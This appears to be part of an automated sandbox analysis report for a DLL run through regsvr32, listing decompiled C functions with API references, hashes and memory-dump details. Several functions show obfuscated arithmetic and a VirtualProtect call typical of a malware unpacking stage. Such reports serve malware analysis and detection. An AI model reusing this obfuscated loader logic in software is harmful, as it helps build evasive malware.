Instruction Fuzzy Hash: E9018639905356AAEF24DB758D4AB8E3BA4EF01361F300178F508E60A1CB39A940DA9D

Uniqueness

Uniqueness Score: -1.00%

Function 10006A92 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E10006A92() {
				int _t1;

				_t1 =  *0x100bc0bc; // 0x311938
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				_push("DllRegisterServer");
				_push(_t1);
				 *((intOrPtr*)(E100014BF()))(); // executed
				return 0;
			}

0x10006a92
0x10006a99
0x10006a9c
0x10006a9c
0x10006aa2
0x10006aa7
0x10006aaf
0x10006ab3

APIs

ExitProcess.KERNEL32 ref: 10006A9C

Strings

DllRegisterServer, xrefs: 10006AA2

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: f164a2c1df02b106beb2bdf30efbd0ca68b12a10d6cf658a2290ad30241125c9
Instruction ID: 33a68f159489793551b4bbe44fd859da3e52daeb7b6bced8c0b969fc6bae3dde
Opcode Fuzzy Hash: f164a2c1df02b106beb2bdf30efbd0ca68b12a10d6cf658a2290ad30241125c9
Instruction Fuzzy Hash: 5EC08CB23083009AFA00EBB28C88E86328EDB00280318880AF600D2114EF3AE9004611

Uniqueness

Uniqueness Score: -1.00%

Function 10003A82 Relevance: 3.2, APIs: 2, Instructions: 214
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 35%

			E10003A82() {
				signed int _t54;
				signed int _t55;
				void* _t60;
				signed int _t65;
				signed int _t71;
				void* _t72;
				signed int _t78;
				signed int _t96;
				signed int _t97;
				signed int _t100;
				void* _t105;
				signed int _t115;
				void* _t116;
				signed int _t126;
				signed int _t140;
				void* _t142;
				signed int _t152;
				signed int _t154;
				signed int _t168;
				signed int _t171;
				signed int _t208;
				signed int _t209;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				intOrPtr _t227;
				void* _t228;

				_t152 =  *0x100b8264; // 0x0
				_t54 =  *0x100b8254; // 0x0
				_t171 =  *0x100b8260; // 0x0
				_t218 =  *0x100b8258; // 0x0
				_t208 =  *0x100b8250; // 0x0
				_t55 = _t54 * _t208;
				_t126 = 0;
				_t2 = _t55 + 1; // 0x1
				 *(_t228 + 0x1c) = 0;
				_t60 = malloc(((_t152 * _t152 + _t2) * _t218 + (_t171 - _t152 * _t54 - _t218 - _t208 + 1) * _t171 + 0x1d40) * 3);
				_t209 =  *0x100b8258; // 0x0
				_t219 =  *0x100b8260; // 0x0
				 *(_t228 + 0x20) = _t60;
				_t154 =  *0x100b8264; // 0x0
				_t227 =  *((intOrPtr*)(_t228 + 0x24));
				if((0x1d40 - _t219) * 3 - (_t154 * _t209 + 1) *  *0x100b825c - _t154 > 0) {
					do {
						_t105 = 0xfffffffc;
						 *(((_t105 - _t219) *  *0x100b825c - (_t154 * _t219 + 2) *  *0x100b8250 + _t219 + (_t209 -  *0x100b8254) * 2) * 3 + _t126 + _t227) = _t126;
						_t168 =  *0x100b8258; // 0x0
						_t220 =  *0x100b8264; // 0x0
						_t115 =  *0x100b8260; // 0x0
						_t116 = 3;
						 *((char*)(((_t116 - _t168) *  *0x100b8254 + (_t115 * _t168 - _t220) * _t115 + _t220) * 3 +  *(_t228 + 0x1c) + _t126)) =  *((intOrPtr*)(_t126 %  *(_t228 + 0x2c) +  *((intOrPtr*)(_t228 + 0x28))));
						_t154 =  *0x100b8264; // 0x0
						_t209 =  *0x100b8258; // 0x0
						_t219 =  *0x100b8260; // 0x0
						_t126 = _t126 + 1;
					} while (_t126 < (0x1d40 - _t219) * 3 - (_t154 * _t209 + 1) *  *0x100b825c - _t154);
				}
				 *(_t228 + 0x14) =  *(_t228 + 0x14) & 0x00000000;
				while(1) {
					_t65 =  *0x100b8254; // 0x0
					asm("cdq");
					_t71 =  *0x100b8250; // 0x0
					_t140 =  *0x100b825c; // 0x0
					 *(_t228 + 0x1c) = (( *( *((intOrPtr*)(_t228 + 0x18)) - _t154 * _t65 +  *0x100b825c + _t154 * _t65 +  *0x100b825c + _t227) & 0x000000ff) +  *((char*)(_t219 - _t219 * _t65 + _t219 * _t65 - _t154 - _t154 - _t65 - _t65 + _t219 +  *(_t228 + 0x1c) +  *(_t228 + 0x14))) +  *(_t228 + 0x1c)) % 0x57c0;
					_t142 = 2;
					_t72 = 3;
					 *((char*)(_t228 + 0x13)) =  *((intOrPtr*)((_t142 - (_t209 * _t209 + _t140 * _t71) * _t219 + (_t209 * _t209 + _t140 * _t71) * _t219) * _t71 +  *(_t228 + 0x14) + ((_t72 - _t219) *  *0x100b8254 + ((_t154 * _t71 + _t209) * _t219 - _t209 - 4) * _t154 + _t209) * 2 + _t227));
					_t78 =  *0x100b8254; // 0x0
					 *((char*)((_t209 * 3 - _t154 - _t154 + _t209) *  *0x100b8254 +  *(_t228 + 0x14) + ((1 - (_t154 * _t219 + _t209) *  *0x100b8250) * _t219 + (1 - _t209) *  *0x100b825c - _t154) * 2 + _t227)) =  *((intOrPtr*)( *((intOrPtr*)(_t228 + 0x18)) - _t78 * 3 + _t227));
					_t96 =  *0x100b825c; // 0x0
					_t97 =  *0x100b8250; // 0x0
					_t100 =  *0x100b8254; // 0x0
					 *(_t228 + 0x14) =  *(_t228 + 0x14) + 1;
					 *((char*)((_t96 * _t96 * _t97 - (_t97 + 1) *  *0x100b8264 << 2) - (4 + _t100 * 8) *  *0x100b8260 +  *((intOrPtr*)(_t228 + 0x18)) + _t227)) =  *((intOrPtr*)(_t228 + 0x13));
					if( *(_t228 + 0x14) >= 0x57c0) {
						break;
					}
					_t209 =  *0x100b8258; // 0x0
					_t219 =  *0x100b8260; // 0x0
					_t154 =  *0x100b8264; // 0x0
				}
				return  *0x100bc094( *(_t228 + 0x1c));
			}

0x10003a85
0x10003a8b
0x10003a90
0x10003aa2
0x10003aa9
0x10003ab1
0x10003ab6
0x10003ac1
0x10003ad3
0x10003ad7
0x10003add
0x10003ae3
0x10003ae9
0x10003aee
0x10003af4
0x10003b15
0x10003b1b
0x10003b2f
0x10003b45
0x10003b48
0x10003b4e
0x10003b5c
0x10003b6d
0x10003b8e
0x10003b91
0x10003b97
0x10003b9d
0x10003baa
0x10003bba
0x10003b1b
0x10003bc2
0x10003bdb
0x10003bdb
0x10003c20
0x10003c28
0x10003c2d
0x10003c36
0x10003c46
0x10003c64
0x10003c7c
0x10003c80
0x10003ccc
0x10003ccf
0x10003cd9
0x10003ceb
0x10003d07
0x10003d17
0x10003d1a
0x00000000
0x00000000
0x10003bc9
0x10003bcf
0x10003bd5
0x10003bd5
0x10003d32

APIs

malloc.MSVCRT ref: 10003AD7
??3@YAXPAX@Z.MSVCRT ref: 10003D24

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ??3@malloc
String ID:
API String ID: 3530088491-0
Opcode ID: f8800837ce64f2cdc43e779a333cc347272846a76cd1fc0710a6f39349f454ec
Instruction ID: 62f6901f4166316c9f15a6d932215c50802101088afbd3becb357e423d0d5db1
Opcode Fuzzy Hash: f8800837ce64f2cdc43e779a333cc347272846a76cd1fc0710a6f39349f454ec
Instruction Fuzzy Hash: 7871B53A7442268FD70CCF7CCED65C5BBDAE7D9214B05962AD540CB3B9EA70A609CB40

Uniqueness

Uniqueness Score: -1.00%

Function 1004FDAA Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1004FDAA(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x100be104 = _t6;
				if(_t6 != 0) {
					_t7 = E1004FD4F(__eflags);
					__eflags = _t7 - 3;
					 *0x100bff64 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = L1004EDF9(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x100be104);
							 *0x100be104 =  *0x100be104 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x1004fdbb
0x1004fdc3
0x1004fdc8
0x1004fdcd
0x1004fdd2
0x1004fdd5
0x1004fdda
0x1004fe00
0x1004fe02
0x1004fe03
0x1004fddc
0x1004fde1
0x1004fde6
0x1004fde9
0x00000000
0x1004fdeb
0x1004fdf1
0x1004fdf7
0x00000000
0x1004fdf7
0x1004fde9
0x1004fdca
0x1004fdca
0x1004fdcc
0x1004fdcc

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,10048C0C,00000001,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C), ref: 1004FDBB
HeapDestroy.KERNEL32(?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 1004FDF1

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 03b4f1f114decc4727ca378d293384e74c17ab74c07022bfccd59dd724457b58
Instruction ID: 0ac11d57fa9a87977446124cfbfb09a9c68fff5c93b403867fcd0a28ce5f26ca
Opcode Fuzzy Hash: 03b4f1f114decc4727ca378d293384e74c17ab74c07022bfccd59dd724457b58
Instruction Fuzzy Hash: 47E06D78A553A29EF710DB748E8D77636D5E704386F30483DF401D60A1EB709980D60A

Uniqueness

Uniqueness Score: -1.00%

Function 10004AC7 Relevance: 1.7, APIs: 1, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E10004AC7() {
				intOrPtr _t88;
				signed int _t90;
				signed int _t91;
				signed int _t102;
				signed int _t103;
				signed int _t113;
				signed int _t119;
				signed int _t121;
				signed int _t125;
				signed int _t131;
				signed int _t143;
				signed int _t144;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t187;
				signed int _t188;
				signed int _t192;
				signed int _t197;
				signed int _t204;
				signed int _t207;
				signed int _t224;
				signed int _t239;
				intOrPtr* _t248;
				void* _t256;

				_t187 =  *(_t256 + 0x18);
				_t88 =  *((intOrPtr*)(_t187 + 8));
				 *((intOrPtr*)(_t256 + 0xc)) = _t88;
				if(_t88 != 0) {
					_t183 =  *0x100b8254; // 0x0
					_t143 =  *(_t187 + 0xc);
					_t188 =  *0x100b825c; // 0x0
					_t207 =  *0x100b8264; // 0x0
					_t204 =  *0x100b8258; // 0x0
					_t90 = _t204 * _t183;
					_t6 = _t188 - 2; // -2
					 *(_t256 + 0x10) = _t90;
					 *(_t256 + 0x14) = _t143;
					if((_t143 & (_t90 + _t6) * _t207 + 0x02000000) == 0) {
						_t91 =  *0x100b8260; // 0x0
						_t144 =  *0x100b8250; // 0x0
						_t47 = _t183 + 2; // 0x2
						_t52 = _t183 + 0x8000000; // 0x8000000
						asm("sbb ebx, ebx");
						asm("sbb eax, eax");
						_t224 =  *0x100b8250; // 0x0
						_t102 =  *0x100b8250; // 0x0
						_t103 =  *0x100b8260; // 0x0
						_t192 =  *0x100b825c; // 0x0
						_t197 =  *0x100b8250; // 0x0
						asm("sbb eax, eax");
						 *(_t256 + 0x18) =  *(0x100b826c + ( ~( ~(_t103 * _t103 + _t192 * _t183 * _t183 + _t103 + (_t224 - _t204 * _t207 - _t188 - 0x00000001) * _t207 - (_t102 + _t204) * _t103 * _t183 + _t204 + _t183 - 0x80000000 &  *(_t256 + 0x14))) + ( ~( ~(0x40000000 + ((_t144 + _t91 + 0x00000001) * _t91 - _t47 * _t183 + _t207 * 0x00000003 - _t188 - _t204) * 0x00000004 &  *(_t256 + 0x14))) +  ~( ~(((_t91 - _t207) *  *0x100b8250 * 0x00000004 - 0x00000008) *  *0x100b8260 + (_t183 + _t52 - _t188 - _t207) * 0x00000004 &  *(_t256 + 0x14))) * 2) * 2) * 4);
						_t113 =  *0x100b8260; // 0x0
						if(( *(_t256 + 0x14) & (1 -  *(_t256 + 0x10) - _t113) * _t207 - _t197 * 0x00000003 - _t113 -  *0x100b825c +  *(_t256 + 0x10) + 0x4000001) != 0) {
							 *(_t256 + 0x18) =  *(_t256 + 0x18) | 0x00000200 - _t113 * 0x0000000c;
						}
						_t119 = VirtualProtect( *( *(_t256 + 0x34)),  *((intOrPtr*)(_t256 + 0x24)) - _t197 * 3,  *(_t256 + 0x1c), _t256 + (((_t113 + _t204) * 8 - 8) * _t113 - (_t183 * _t183 << 3) + 8) * _t113 + 0x28 + ((_t183 * _t207 + 1) * _t204 - _t183 * 3 - (_t207 << 2)) * 8); // executed
						asm("sbb eax, eax");
						_t121 =  ~( ~_t119);
						L14:
						return _t121;
					}
					_t239 =  *(_t256 + 0x28);
					_t181 =  *_t239;
					 *(_t256 + 0x18) = _t181;
					if(_t181 !=  *((intOrPtr*)(_t239 + 4))) {
						L10:
						_t121 = 1;
						goto L14;
					}
					_t182 =  *0x100b8260; // 0x0
					if( *((intOrPtr*)(_t239 + 0x10)) != 0) {
						L9:
						_t125 =  *0x100b8250; // 0x0
						_t35 = _t125 * 2; // 0x2001
						_t38 = _t125 * _t125 * _t125 * _t183 - 8; // -8
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x30)) + 0x20))( *((intOrPtr*)(_t256 + 0x24)),  *((intOrPtr*)(_t256 + 0x24)), (_t125 * _t125 * _t125 * _t183 + _t38) * _t182 + ((1 - _t90 - _t207) * _t204 - (_t183 + _t207) * _t188 + _t183 + _t35 + 0x2000 + _t207) * 2,  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x24)) + 0x34)));
						goto L10;
					}
					_t248 =  *((intOrPtr*)(_t256 + 0x24));
					_t131 =  *(_t248 + 0x3c);
					 *(_t256 + 0x28) = _t131;
					if( *((intOrPtr*)( *_t248 + 0x38)) == _t131) {
						L8:
						_t90 =  *(_t256 + 0x10);
						goto L9;
					}
					if( *(_t256 + 0x1c) %  *(_t256 + 0x28) + ((_t183 - _t204 * _t207) * _t204 - (_t188 * _t204 + _t182 + 2) * _t188 + _t182 + _t207) * 2 != 0) {
						goto L10;
					}
					_t188 =  *0x100b825c; // 0x0
					goto L8;
				}
				return _t88 + 1;
			}

0x10004aca
0x10004ace
0x10004ad3
0x10004ad7
0x10004adf
0x10004ae6
0x10004ae9
0x10004af1
0x10004af8
0x10004b00
0x10004b03
0x10004b12
0x10004b16
0x10004b1a
0x10004be5
0x10004bea
0x10004bf7
0x10004c15
0x10004c1e
0x10004c46
0x10004c48
0x10004c5a
0x10004c64
0x10004c75
0x10004c8a
0x10004ca1
0x10004cb9
0x10004cbd
0x10004ce2
0x10004cf0
0x10004cf0
0x10004d42
0x10004d4a
0x10004d4c
0x10004d4e
0x00000000
0x10004d51
0x10004b20
0x10004b24
0x10004b2a
0x10004b2e
0x10004bdd
0x10004bdf
0x00000000
0x10004bdf
0x10004b38
0x10004b3e
0x10004b8c
0x10004ba5
0x10004bac
0x10004bc0
0x10004bd7
0x00000000
0x10004bda
0x10004b40
0x10004b44
0x10004b4a
0x10004b51
0x10004b88
0x10004b88
0x00000000
0x10004b88
0x10004b80
0x00000000
0x00000000
0x10004b82
0x00000000
0x10004b82
0x00000000

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3a04f4dff34a31cf402d9c2459d2c1a64f6553dd01cc38d54e39f4c535d94b
Instruction ID: cba6f9133dd935da1f7fb0af6c162101a408afe13dd0a8dcfb9efeb81b3381b4
Opcode Fuzzy Hash: ef3a04f4dff34a31cf402d9c2459d2c1a64f6553dd01cc38d54e39f4c535d94b
Instruction Fuzzy Hash: 2D81A87524431E8FD708DF68CAC1A85BBE8FB99340F01563AD955CB2B5F670DA18CB84

Uniqueness

Uniqueness Score: -1.00%

Function 10006A41 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E10006A41(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				void* _t4;
				signed int _t9;
				char _t11;
				signed int _t14;
				void* _t16;
				void* _t17;
				signed int _t19;

				_t4 = E10047026(__ebx, _t16, _t17, __esi);
				if(_t4 != 0) {
					_t14 =  *0x100b8268; // 0x0
					_push(__ebx);
					_t11 = 0;
					__eflags = _t14;
					_push(__esi);
					_t19 = _t14;
					if(__eflags > 0) {
						do {
							 *((char*)(_t11 + _t4)) = _t11;
							_t11 = _t11 + 1;
							__eflags = _t11 -  *0x100b8268; // 0x0
						} while (__eflags < 0);
					}
					_push(_t4); // executed
					E100470E9(_t11, _t17, _t19, __eflags); // executed
					asm("sbb eax, eax");
					_t9 =  ~(_t11 - _t19) & 0x00000003;
					__eflags = _t9;
					return _t9;
				} else {
					return _t4;
				}
			}

0x10006a46
0x10006a4e
0x10006a51
0x10006a57
0x10006a58
0x10006a5a
0x10006a5c
0x10006a5d
0x10006a5f
0x10006a61
0x10006a61
0x10006a64
0x10006a65
0x10006a65
0x10006a61
0x10006a6d
0x10006a6e
0x10006a7a
0x10006a7d
0x10006a7d
0x10006a81
0x10006a50
0x10006a50
0x10006a50

APIs

_malloc.LIBCMT ref: 10006A46

Part of subcall function 10047026: __FF_MSGBANNER.LIBCMT ref: 10047049
Part of subcall function 10047026: __NMSG_WRITE.LIBCMT ref: 10047050
Part of subcall function 10047026: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001), ref: 1004709E

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 0c74340f4aac69231e506ba60836da3ec54c1cf5d74f5cb118ecd3987c823857
Instruction ID: 4f145986321b1b754f88d515b63b48c0031841552eadea7b4491a108aed0ee8e
Opcode Fuzzy Hash: 0c74340f4aac69231e506ba60836da3ec54c1cf5d74f5cb118ecd3987c823857
Instruction Fuzzy Hash: A3E0CD3B3555234FFF04FBFC9CD54551249D71509132447B9F441D6556E920ED00C761

Uniqueness

Uniqueness Score: -1.00%

Function 1004C659 Relevance: 1.5, APIs: 1, Instructions: 6
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E1004C659() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E1004C569(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x1004c659
0x1004c65b
0x1004c65d
0x1004c65f
0x1004c667

APIs

_doexit.LIBCMT ref: 1004C65F

Part of subcall function 1004C569: __lock.LIBCMT ref: 1004C577
Part of subcall function 1004C569: __decode_pointer.LIBCMT ref: 1004C5A6
Part of subcall function 1004C569: __decode_pointer.LIBCMT ref: 1004C5B3

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __decode_pointer$__lock_doexit
String ID:
API String ID: 3276244213-0
Opcode ID: 30728fd0b73de8e9593f588b56ecaf7ae26a14441270695ef39d91977627781b
Instruction ID: 14c789b520978ccb89d4cdf03b6d23a9df2590e4dd267fbcd28f0b27d1ba4d1f
Opcode Fuzzy Hash: 30728fd0b73de8e9593f588b56ecaf7ae26a14441270695ef39d91977627781b
Instruction Fuzzy Hash: 3FA00269BD470461F8A0D1502C43F5821415764F01FE40060FB0CAC1C1A4C63298405B

Uniqueness

Uniqueness Score: -1.00%

Function 10001186 Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10001186(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}

0x10006060
0x10006066

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 10006060

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 337bfef5fbb8ec1e80fc560bc03efe550ee3042e26fca0366982ee7275b36580
Instruction ID: 01b1a425d789cbdabc9439a8440992a441d7e150583865e39de4930a53530a10
Opcode Fuzzy Hash: 337bfef5fbb8ec1e80fc560bc03efe550ee3042e26fca0366982ee7275b36580
Instruction Fuzzy Hash: 6BC00836458796EBDF12DF90CD44A6FBBA2FB88745F280D5CF6A251074C7229428EF06

Uniqueness

Uniqueness Score: -1.00%

Function 100011BD Relevance: 1.3, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100011BD(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}

0x10006078
0x1000607e

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 10006078

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
